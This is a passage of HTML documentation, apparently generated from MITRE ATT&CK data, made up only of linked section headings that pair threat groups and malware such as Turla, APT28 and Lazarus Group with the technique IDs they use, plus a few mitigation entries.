<h3 id="_permission_groups_discovery_mitigation_t1069_mitigates_permission_groups_discovery_t1069"><a class="anchor" href="#_permission_groups_discovery_mitigation_t1069_mitigates_permission_groups_discovery_t1069"></a><a class="link" href="#_permission_groups_discovery_mitigation_t1069_mitigates_permission_groups_discovery_t1069">Permission Groups Discovery Mitigation (T1069) mitigates Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_command_line_interface_t1059"><a class="anchor" href="#_moonwind_s0149_uses_command_line_interface_t1059"></a><a class="link" href="#_moonwind_s0149_uses_command_line_interface_t1059">MoonWind (S0149) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_system_service_discovery_t1007"><a class="anchor" href="#_ke3chang_g0004_uses_system_service_discovery_t1007"></a><a class="link" href="#_ke3chang_g0004_uses_system_service_discovery_t1007">Ke3chang (G0004) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_valid_accounts_t1078"><a class="anchor" href="#_shamoon_s0140_uses_valid_accounts_t1078"></a><a class="link" href="#_shamoon_s0140_uses_valid_accounts_t1078">Shamoon (S0140) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_windows_admin_shares_t1077"><a class="anchor" href="#_turla_g0010_uses_windows_admin_shares_t1077"></a><a class="link" href="#_turla_g0010_uses_windows_admin_shares_t1077">Turla (G0010) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_scarlet_mimic_g0029_uses_psylo_s0078"><a class="anchor" href="#_scarlet_mimic_g0029_uses_psylo_s0078"></a><a class="link" href="#_scarlet_mimic_g0029_uses_psylo_s0078">Scarlet Mimic (G0029) uses Psylo (S0078)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_fallback_channels_t1008"><a class="anchor" href="#_lazarus_group_g0032_uses_fallback_channels_t1008"></a><a class="link" href="#_lazarus_group_g0032_uses_fallback_channels_t1008">Lazarus Group (G0032) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_system_information_discovery_t1082"><a class="anchor" href="#_remsec_s0125_uses_system_information_discovery_t1082"></a><a class="link" href="#_remsec_s0125_uses_system_information_discovery_t1082">Remsec (S0125) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_powershell_t1086"><a class="anchor" href="#_magic_hound_g0059_uses_powershell_t1086"></a><a class="link" href="#_magic_hound_g0059_uses_powershell_t1086">Magic Hound (G0059) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_reaver_s0172_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_reaver_s0172_uses_obfuscated_files_or_information_t1027">Reaver (S0172) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_domain_fronting_mitigation_t1172_mitigates_domain_fronting_t1172"><a class="anchor" href="#_domain_fronting_mitigation_t1172_mitigates_domain_fronting_t1172"></a><a class="link" href="#_domain_fronting_mitigation_t1172_mitigates_domain_fronting_t1172">Domain Fronting Mitigation (T1172) mitigates Domain Fronting (T1172)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_advstoreshell_s0045"><a class="anchor" href="#_apt28_g0007_uses_advstoreshell_s0045"></a><a class="link" href="#_apt28_g0007_uses_advstoreshell_s0045">APT28 (G0007) uses ADVSTORESHELL (S0045)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_ipconfig_s0100"><a class="anchor" href="#_threat_group_3390_g0027_uses_ipconfig_s0100"></a><a class="link" href="#_threat_group_3390_g0027_uses_ipconfig_s0100">Threat Group-3390 (G0027) uses ipconfig (S0100)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_seaduke_s0053_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_seaduke_s0053_uses_standard_application_layer_protocol_t1071">SeaDuke (S0053) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_cmd_s0106_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_cmd_s0106_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_cmd_s0106_uses_file_and_directory_discovery_t1083">cmd (S0106) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_netstat_s0104"><a class="anchor" href="#_turla_g0010_uses_netstat_s0104"></a><a class="link" href="#_turla_g0010_uses_netstat_s0104">Turla (G0010) uses netstat (S0104)</a></h3>
</div>
<div class="sect2">
<h3 id="_poisonivy_s0012_uses_input_capture_t1056"><a class="anchor" href="#_poisonivy_s0012_uses_input_capture_t1056"></a><a class="link" href="#_poisonivy_s0012_uses_input_capture_t1056">PoisonIvy (S0012) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_reaver_s0172_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_reaver_s0172_uses_standard_application_layer_protocol_t1071">Reaver (S0172) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_shotput_s0063_uses_process_discovery_t1057"><a class="anchor" href="#_shotput_s0063_uses_process_discovery_t1057"></a><a class="link" href="#_shotput_s0063_uses_process_discovery_t1057">SHOTPUT (S0063) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_mivast_s0080_uses_credential_dumping_t1003"><a class="anchor" href="#_mivast_s0080_uses_credential_dumping_t1003"></a><a class="link" href="#_mivast_s0080_uses_credential_dumping_t1003">Mivast (S0080) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_oilrig_g0049_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_oilrig_g0049_uses_obfuscated_files_or_information_t1027">OilRig (G0049) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_remote_file_copy_t1105"><a class="anchor" href="#_gamaredon_group_g0047_uses_remote_file_copy_t1105"></a><a class="link" href="#_gamaredon_group_g0047_uses_remote_file_copy_t1105">Gamaredon Group (G0047) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_bs2005_s0014_uses_data_encoding_t1132"><a class="anchor" href="#_bs2005_s0014_uses_data_encoding_t1132"></a><a class="link" href="#_bs2005_s0014_uses_data_encoding_t1132">BS2005 (S0014) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_transfer_size_limits_mitigation_t1030_mitigates_data_transfer_size_limits_t1030"><a class="anchor" href="#_data_transfer_size_limits_mitigation_t1030_mitigates_data_transfer_size_limits_t1030"></a><a class="link" href="#_data_transfer_size_limits_mitigation_t1030_mitigates_data_transfer_size_limits_t1030">Data Transfer Size Limits Mitigation (T1030) mitigates Data Transfer Size Limits (T1030)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_lazarus_group_g0032_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_lazarus_group_g0032_uses_exfiltration_over_command_and_control_channel_t1041">Lazarus Group (G0032) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_turla_g0010_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_turla_g0010_uses_file_and_directory_discovery_t1083">Turla (G0010) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_valid_accounts_t1078"><a class="anchor" href="#_seaduke_s0053_uses_valid_accounts_t1078"></a><a class="link" href="#_seaduke_s0053_uses_valid_accounts_t1078">SeaDuke (S0053) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_command_line_interface_t1059"><a class="anchor" href="#_matroyshka_s0167_uses_command_line_interface_t1059"></a><a class="link" href="#_matroyshka_s0167_uses_command_line_interface_t1059">Matroyshka (S0167) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_web_service_t1102"><a class="anchor" href="#_badnews_s0128_uses_web_service_t1102"></a><a class="link" href="#_badnews_s0128_uses_web_service_t1102">BADNEWS (S0128) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_windshield_s0155_uses_file_deletion_t1107"><a class="anchor" href="#_windshield_s0155_uses_file_deletion_t1107"></a><a class="link" href="#_windshield_s0155_uses_file_deletion_t1107">WINDSHIELD (S0155) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_hammertoss_s0037"><a class="anchor" href="#_apt29_g0016_uses_hammertoss_s0037"></a><a class="link" href="#_apt29_g0016_uses_hammertoss_s0037">APT29 (G0016) uses HAMMERTOSS (S0037)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_input_capture_t1056"><a class="anchor" href="#_magic_hound_g0059_uses_input_capture_t1056"></a><a class="link" href="#_magic_hound_g0059_uses_input_capture_t1056">Magic Hound (G0059) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_file_deletion_t1107"><a class="anchor" href="#_oilrig_g0049_uses_file_deletion_t1107"></a><a class="link" href="#_oilrig_g0049_uses_file_deletion_t1107">OilRig (G0049) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_moonwind_s0149_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_moonwind_s0149_uses_peripheral_device_discovery_t1120">MoonWind (S0149) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_screen_capture_t1113"><a class="anchor" href="#_daserf_s0187_uses_screen_capture_t1113"></a><a class="link" href="#_daserf_s0187_uses_screen_capture_t1113">Daserf (S0187) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt17_g0025_uses_blackcoffee_s0069"><a class="anchor" href="#_apt17_g0025_uses_blackcoffee_s0069"></a><a class="link" href="#_apt17_g0025_uses_blackcoffee_s0069">APT17 (G0025) uses BLACKCOFFEE (S0069)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_elmer_s0064"><a class="anchor" href="#_apt16_g0023_uses_elmer_s0064"></a><a class="link" href="#_apt16_g0023_uses_elmer_s0064">APT16 (G0023) uses ELMER (S0064)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_modify_registry_t1112"><a class="anchor" href="#_regin_s0019_uses_modify_registry_t1112"></a><a class="link" href="#_regin_s0019_uses_modify_registry_t1112">Regin (S0019) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_system_service_discovery_t1007"><a class="anchor" href="#_emissary_s0082_uses_system_service_discovery_t1007"></a><a class="link" href="#_emissary_s0082_uses_system_service_discovery_t1007">Emissary (S0082) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_new_service_t1050"><a class="anchor" href="#_jhuhugit_s0044_uses_new_service_t1050"></a><a class="link" href="#_jhuhugit_s0044_uses_new_service_t1050">JHUHUGIT (S0044) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_daserf_s0187"><a class="anchor" href="#_bronze_butler_g0060_uses_daserf_s0187"></a><a class="link" href="#_bronze_butler_g0060_uses_daserf_s0187">BRONZE BUTLER (G0060) uses Daserf (S0187)</a></h3>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033_uses_masquerading_t1036"><a class="anchor" href="#_poseidon_group_g0033_uses_masquerading_t1036"></a><a class="link" href="#_poseidon_group_g0033_uses_masquerading_t1036">Poseidon Group (G0033) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_data_encrypted_t1022"><a class="anchor" href="#_advstoreshell_s0045_uses_data_encrypted_t1022"></a><a class="link" href="#_advstoreshell_s0045_uses_data_encrypted_t1022">ADVSTORESHELL (S0045) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_command_line_interface_t1059"><a class="anchor" href="#_oilrig_g0049_uses_command_line_interface_t1059"></a><a class="link" href="#_oilrig_g0049_uses_command_line_interface_t1059">OilRig (G0049) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_elise_s0081_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_elise_s0081_uses_system_network_configuration_discovery_t1016">Elise (S0081) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_group5_g0043_uses_software_packing_t1045"><a class="anchor" href="#_group5_g0043_uses_software_packing_t1045"></a><a class="link" href="#_group5_g0043_uses_software_packing_t1045">Group5 (G0043) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_valid_accounts_t1078"><a class="anchor" href="#_fin10_g0051_uses_valid_accounts_t1078"></a><a class="link" href="#_fin10_g0051_uses_valid_accounts_t1078">FIN10 (G0051) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_modify_registry_t1112"><a class="anchor" href="#_rover_s0090_uses_modify_registry_t1112"></a><a class="link" href="#_rover_s0090_uses_modify_registry_t1112">Rover (S0090) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_usbstealer_s0136_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_usbstealer_s0136_uses_registry_run_keys_start_folder_t1060">USBStealer (S0136) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_audio_capture_t1123"><a class="anchor" href="#_flame_s0143_uses_audio_capture_t1123"></a><a class="link" href="#_flame_s0143_uses_audio_capture_t1123">Flame (S0143) uses Audio Capture (T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_service_execution_t1035"><a class="anchor" href="#_bbsrat_s0127_uses_service_execution_t1035"></a><a class="link" href="#_bbsrat_s0127_uses_service_execution_t1035">BBSRAT (S0127) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_system_information_discovery_t1082"><a class="anchor" href="#_patchwork_g0040_uses_system_information_discovery_t1082"></a><a class="link" href="#_patchwork_g0040_uses_system_information_discovery_t1082">Patchwork (G0040) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_network_share_discovery_t1135"><a class="anchor" href="#_cobalt_strike_s0154_uses_network_share_discovery_t1135"></a><a class="link" href="#_cobalt_strike_s0154_uses_network_share_discovery_t1135">Cobalt Strike (S0154) uses Network Share Discovery (T1135)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_remote_file_copy_t1105"><a class="anchor" href="#_jhuhugit_s0044_uses_remote_file_copy_t1105"></a><a class="link" href="#_jhuhugit_s0044_uses_remote_file_copy_t1105">JHUHUGIT (S0044) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_fallback_channels_t1008"><a class="anchor" href="#_dustysky_s0062_uses_fallback_channels_t1008"></a><a class="link" href="#_dustysky_s0062_uses_fallback_channels_t1008">DustySky (S0062) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_evilgrab_s0152_uses_input_capture_t1056"><a class="anchor" href="#_evilgrab_s0152_uses_input_capture_t1056"></a><a class="link" href="#_evilgrab_s0152_uses_input_capture_t1056">EvilGrab (S0152) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_certutil_s0160_uses_install_root_certificate_t1130"><a class="anchor" href="#_certutil_s0160_uses_install_root_certificate_t1130"></a><a class="link" href="#_certutil_s0160_uses_install_root_certificate_t1130">certutil (S0160) uses Install Root Certificate (T1130)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_misdat_s0083_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_misdat_s0083_uses_standard_non_application_layer_protocol_t1095">Misdat (S0083) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_process_discovery_t1057"><a class="anchor" href="#_lazarus_group_g0032_uses_process_discovery_t1057"></a><a class="link" href="#_lazarus_group_g0032_uses_process_discovery_t1057">Lazarus Group (G0032) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_crimson_s0115_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_crimson_s0115_uses_system_network_configuration_discovery_t1016">Crimson (S0115) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_mimikatz_s0002"><a class="anchor" href="#_apt28_g0007_uses_mimikatz_s0002"></a><a class="link" href="#_apt28_g0007_uses_mimikatz_s0002">APT28 (G0007) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_screen_capture_t1113"><a class="anchor" href="#_kasidet_s0088_uses_screen_capture_t1113"></a><a class="link" href="#_kasidet_s0088_uses_screen_capture_t1113">Kasidet (S0088) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_evilgrab_s0152_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_evilgrab_s0152_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_evilgrab_s0152_uses_registry_run_keys_start_folder_t1060">EvilGrab (S0152) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_bronze_butler_g0060_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_bronze_butler_g0060_uses_standard_application_layer_protocol_t1071">BRONZE BUTLER (G0060) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_access_token_manipulation_t1134"><a class="anchor" href="#_cobalt_strike_s0154_uses_access_token_manipulation_t1134"></a><a class="link" href="#_cobalt_strike_s0154_uses_access_token_manipulation_t1134">Cobalt Strike (S0154) uses Access Token Manipulation (T1134)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_emissary_s0082_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_emissary_s0082_uses_permission_groups_discovery_t1069">Emissary (S0082) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_execution_through_api_t1106"><a class="anchor" href="#_cobalt_strike_s0154_uses_execution_through_api_t1106"></a><a class="link" href="#_cobalt_strike_s0154_uses_execution_through_api_t1106">Cobalt Strike (S0154) uses Execution through API (T1106)</a></h3>
</div>
<div class="sect2">
<h3 id="_downdelph_s0134_uses_data_obfuscation_t1001"><a class="anchor" href="#_downdelph_s0134_uses_data_obfuscation_t1001"></a><a class="link" href="#_downdelph_s0134_uses_data_obfuscation_t1001">Downdelph (S0134) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_data_from_local_system_t1005"><a class="anchor" href="#_patchwork_g0040_uses_data_from_local_system_t1005"></a><a class="link" href="#_patchwork_g0040_uses_data_from_local_system_t1005">Patchwork (G0040) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_shortcut_modification_t1023"><a class="anchor" href="#_reaver_s0172_uses_shortcut_modification_t1023"></a><a class="link" href="#_reaver_s0172_uses_shortcut_modification_t1023">Reaver (S0172) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackcoffee_s0069_uses_command_line_interface_t1059"><a class="anchor" href="#_blackcoffee_s0069_uses_command_line_interface_t1059"></a><a class="link" href="#_blackcoffee_s0069_uses_command_line_interface_t1059">BLACKCOFFEE (S0069) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_3para_rat_s0066_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_3para_rat_s0066_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_3para_rat_s0066_uses_file_and_directory_discovery_t1083">3PARA RAT (S0066) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_process_injection_t1055"><a class="anchor" href="#_putter_panda_g0024_uses_process_injection_t1055"></a><a class="link" href="#_putter_panda_g0024_uses_process_injection_t1055">Putter Panda (G0024) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_binary_padding_t1009"><a class="anchor" href="#_coreshell_s0137_uses_binary_padding_t1009"></a><a class="link" href="#_coreshell_s0137_uses_binary_padding_t1009">CORESHELL (S0137) uses Binary Padding (T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_multiband_communication_t1026"><a class="anchor" href="#_plugx_s0013_uses_multiband_communication_t1026"></a><a class="link" href="#_plugx_s0013_uses_multiband_communication_t1026">PlugX (S0013) uses Multiband Communication (T1026)</a></h3>
</div>
<div class="sect2">
<h3 id="_screensaver_mitigation_t1180_mitigates_screensaver_t1180"><a class="anchor" href="#_screensaver_mitigation_t1180_mitigates_screensaver_t1180"></a><a class="link" href="#_screensaver_mitigation_t1180_mitigates_screensaver_t1180">Screensaver Mitigation (T1180) mitigates Screensaver (T1180)</a></h3>
</div>
<div class="sect2">
<h3 id="_truvasys_s0178_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_truvasys_s0178_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_truvasys_s0178_uses_registry_run_keys_start_folder_t1060">Truvasys (S0178) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_input_capture_t1056"><a class="anchor" href="#_rtm_s0148_uses_input_capture_t1056"></a><a class="link" href="#_rtm_s0148_uses_input_capture_t1056">RTM (S0148) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_fallback_channels_t1008"><a class="anchor" href="#_s_type_s0085_uses_fallback_channels_t1008"></a><a class="link" href="#_s_type_s0085_uses_fallback_channels_t1008">S-Type (S0085) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_connection_proxy_t1090"><a class="anchor" href="#_lazarus_group_g0032_uses_connection_proxy_t1090"></a><a class="link" href="#_lazarus_group_g0032_uses_connection_proxy_t1090">Lazarus Group (G0032) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_1314_g0028_uses_psexec_s0029"><a class="anchor" href="#_threat_group_1314_g0028_uses_psexec_s0029"></a><a class="link" href="#_threat_group_1314_g0028_uses_psexec_s0029">Threat Group-1314 (G0028) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_elise_s0081_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_elise_s0081_uses_standard_application_layer_protocol_t1071">Elise (S0081) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_bootkit_t1067"><a class="anchor" href="#_apt28_g0007_uses_bootkit_t1067"></a><a class="link" href="#_apt28_g0007_uses_bootkit_t1067">APT28 (G0007) uses Bootkit (T1067)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_automated_collection_t1119"><a class="anchor" href="#_fin5_g0053_uses_automated_collection_t1119"></a><a class="link" href="#_fin5_g0053_uses_automated_collection_t1119">FIN5 (G0053) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_moonwind_s0149_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_moonwind_s0149_uses_system_network_configuration_discovery_t1016">MoonWind (S0149) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_agent_btz_s0092_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_agent_btz_s0092_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_agent_btz_s0092_uses_system_owner_user_discovery_t1033">Agent.btz (S0092) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_neodymium_g0055_uses_wingbird_s0176"><a class="anchor" href="#_neodymium_g0055_uses_wingbird_s0176"></a><a class="link" href="#_neodymium_g0055_uses_wingbird_s0176">NEODYMIUM (G0055) uses Wingbird (S0176)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_windows_credential_editor_s0005"><a class="anchor" href="#_bronze_butler_g0060_uses_windows_credential_editor_s0005"></a><a class="link" href="#_bronze_butler_g0060_uses_windows_credential_editor_s0005">BRONZE BUTLER (G0060) uses Windows Credential Editor (S0005)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_powershell_t1086"><a class="anchor" href="#_apt34_g0057_uses_powershell_t1086"></a><a class="link" href="#_apt34_g0057_uses_powershell_t1086">APT34 (G0057) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_account_discovery_t1087"><a class="anchor" href="#_duqu_s0038_uses_account_discovery_t1087"></a><a class="link" href="#_duqu_s0038_uses_account_discovery_t1087">Duqu (S0038) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_system_information_discovery_t1082"><a class="anchor" href="#_powerduke_s0139_uses_system_information_discovery_t1082"></a><a class="link" href="#_powerduke_s0139_uses_system_information_discovery_t1082">PowerDuke (S0139) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_emissary_s0082_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_emissary_s0082_uses_obfuscated_files_or_information_t1027">Emissary (S0082) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_connection_proxy_t1090"><a class="anchor" href="#_regin_s0019_uses_connection_proxy_t1090"></a><a class="link" href="#_regin_s0019_uses_connection_proxy_t1090">Regin (S0019) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_commonly_used_port_t1043"><a class="anchor" href="#_httpbrowser_s0070_uses_commonly_used_port_t1043"></a><a class="link" href="#_httpbrowser_s0070_uses_commonly_used_port_t1043">HTTPBrowser (S0070) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_component_object_model_hijacking_mitigation_t1122_mitigates_component_object_model_hijacking_t1122"><a class="anchor" href="#_component_object_model_hijacking_mitigation_t1122_mitigates_component_object_model_hijacking_t1122"></a><a class="link" href="#_component_object_model_hijacking_mitigation_t1122_mitigates_component_object_model_hijacking_t1122">Component Object Model Hijacking Mitigation (T1122) mitigates Component Object Model Hijacking (T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_systeminfo_s0096"><a class="anchor" href="#_turla_g0010_uses_systeminfo_s0096"></a><a class="link" href="#_turla_g0010_uses_systeminfo_s0096">Turla (G0010) uses Systeminfo (S0096)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_screen_capture_t1113"><a class="anchor" href="#_redleaves_s0153_uses_screen_capture_t1113"></a><a class="link" href="#_redleaves_s0153_uses_screen_capture_t1113">RedLeaves (S0153) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_input_capture_t1056"><a class="anchor" href="#_regin_s0019_uses_input_capture_t1056"></a><a class="link" href="#_regin_s0019_uses_input_capture_t1056">Regin (S0019) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_space_after_filename_mitigation_t1151_mitigates_space_after_filename_t1151"><a class="anchor" href="#_space_after_filename_mitigation_t1151_mitigates_space_after_filename_t1151"></a><a class="link" href="#_space_after_filename_mitigation_t1151_mitigates_space_after_filename_t1151">Space after Filename Mitigation (T1151) mitigates Space after Filename (T1151)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_reaver_s0172_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_reaver_s0172_uses_registry_run_keys_start_folder_t1060">Reaver (S0172) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
